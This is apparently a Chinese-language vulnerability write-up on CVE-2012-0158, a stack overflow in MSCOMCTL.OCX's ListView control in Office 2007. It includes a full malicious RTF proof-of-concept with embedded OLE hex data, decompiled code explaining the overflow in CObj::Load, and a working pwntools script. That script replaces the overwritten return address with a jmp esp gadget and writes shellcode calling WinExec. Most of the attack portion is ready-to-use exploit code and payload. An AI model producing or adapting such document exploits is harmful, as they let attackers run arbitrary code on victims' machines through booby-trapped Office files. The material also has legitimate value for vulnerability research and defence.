CVE-2012-0158 Office Stack Overflow

环境:

1
2
Windows 10
office 2007

Analyze

样本poc.doc:

1
2
3
4
5
6
7
8
9
10
11
{\rtf1
{\fonttbl{\f0\fnil\fcharset0 Verdana;}}
\viewkind4\uc1\pard\sb100\sa100\lang9\f0\fs22\par
\pard\sa200\sl276\slmult1\lang9\fs22\par
{\object\objocx
{\*\objdata
01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E32000000000000000000000E0000
D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F02836280000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000003004F00430058004E0041004D004500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000160000000000000043006F006E00740065006E007400730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000020000007E05000000000000FEFFFFFFFEFFFFFF030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF009203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004C00690073007400560069006500770041000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB010006001C000000000000000000000000060001560A000001EFCDAB00000500985D6501070000000800008005000080000000000000000000000000000000001FDEECBD010005009017190000000800000049746D736400000002000000010000000C000000436F626A640000008282000082820000000000000000000000000000414141410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
}
}
}

直接打开样本office会crash
在此过程中用windbg附加进程:
Windbg
可以看到ip被劫持到0x41414141,很明显是通过”AAAA”覆盖了返回地址
直接查看调用堆栈没有信息
查看栈内信息,看到最近的一处函数地址在MSCOMCTL.OCX:
Windbg
找到符号信息文件MSCOMCTL.dbg,和MSCOMCTL.OCX放到同一位置,ida载入,跳到栈内地址位置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
HRESULT __stdcall CObj::Load(CObj *this, BSTR bstrString)
{
struct IStream *v2; // ebx
HRESULT result; // eax
HRESULT v4; // esi
char v5[4]; // [esp+Ch] [ebp-14h]
SIZE_T dwBytes; // [esp+14h] [ebp-Ch]
char v7[4]; // [esp+18h] [ebp-8h]
int v8; // [esp+1Ch] [ebp-4h]

v2 = (struct IStream *)bstrString;
result = ReadBytesFromStreamPadded(v5, (struct IStream *)bstrString, 0xCu);
if ( result >= 0 )
{
if ( *(_DWORD *)v5 == 'jboC' && dwBytes >= 8 )
{
v4 = ReadBytesFromStreamPadded(v7, v2, dwBytes);// 实现copy操作
if ( v4 >= 0 )
{
if ( !*(_DWORD *)v7 )
goto LABEL_8;
bstrString = 0;
v4 = ReadBstrFromStreamPadded((UINT)&bstrString, v2);
if ( v4 >= 0 )
{
CObj::SetKey((CObj *)((char *)this - 36), bstrString);
SysFreeString(bstrString);
LABEL_8:
if ( v8 )
v4 = ReadVariantFromStream((struct tagVARIANT *)((char *)this + 20), v2);
return v4;
}
}
return v4;
}
result = 0x8000FFFF;
}
return result;
}

ida下attach动态调试看到程序正是在CObj::Load返回时栈内返回地址被覆盖为”AAAA”
在这里,程序会调用ReadBytesFromStreamPadded(v5, (struct IStream *)bstrString, 0xCu)将ole对象中Contents流数据开始0xC复制到栈上,对应v5为数据头,检测其为”Cobj”,而后紧跟着是数据的长度,其被复制到dwBytes位置,检测其大小不小于8后,将其中对应大小复制到栈上,此时因为dwBytes可控,当复制长度大于栈内预留空间时便会导致栈溢出
重新看一下样本文件:
RTF格式,具体参考:

1
https://www.freebuf.com/vuls/161753.html

offvis直接打开无法识别OLE数据:
OLE
这是因为OLE数据以hex流存储
将D0CF11E(标识OLE头)后的hex流提取保存重新识别
首先使用OleFileView或者oletools查看文件
主要看到有三个流:
Stream
可以看到CXNAME主要声明是一个ListViewA控件,通过其对应的clsid对应的注册表也可以看到:
clsid
mscomctl
可以看到对应处理位置位于MSCOMCTL
所以整个问题位于MSCOMCTL处理ListViewA控件过程中,处理Contents流时,在判断头”Cobjd”后直接按照文件中定义的长度将后面数据直接复制到栈中从而造成栈溢出

POC

样本中的长度设置为0x8282因此可以直接容下整个shellcode,我们只需要将原本crash的AAAA修改为jmp esp并在栈内写入shellcode即可(MSCOMCTL.OCX不存在保护),针,动态调试在MSCOMCTL.OCX中搜索”\xFF\xE4”(jmp esp),找到后填入shellcode再针对Windows10设置特定调用函数地址即可:

1
2
WinExec("calc.exe", 5)
ExitProcess(0)

windbg或者dllexp找到函数地址:
windbg
dllexp
EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
shellcode=asm("push ebp\n\
mov ebp,esp\n\
xor eax,eax\n\
push eax\n\
mov eax,0x6578652e\n\
push eax\n\
mov eax,0x636c6163\n\
push eax\n\
mov eax,esp\n\
push 5\n\
push eax\n\
mov eax,0x753039f0/*address of WinExec*/\n\
call eax\n\
xor eax,eax\n\
push eax\n\
mov eax,0x752c3a20/*address of ExitProcess*/\n\
call eax\n\
mov esp,ebp\n\
pop ebp")
jmp_esp="\x5b\xc0\x63\x27\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode=jmp_esp+shellcode
shellcode_str=shellcode.encode("hex")
with open("./poc.doc","rb+") as f:
ans=f.read()
index=ans.find("41414141")
final=ans.replace(ans[index:index+len(shellcode_str)],shellcode_str)
#print final
with open("./final_poc.doc","wb+") as f2:
f2.write(final)
#考虑到加载地址变化问题
#可以在shellcode里从MSCOMCTL.OCX中获得一个kernel32地址,再根据偏移计算基址

PWN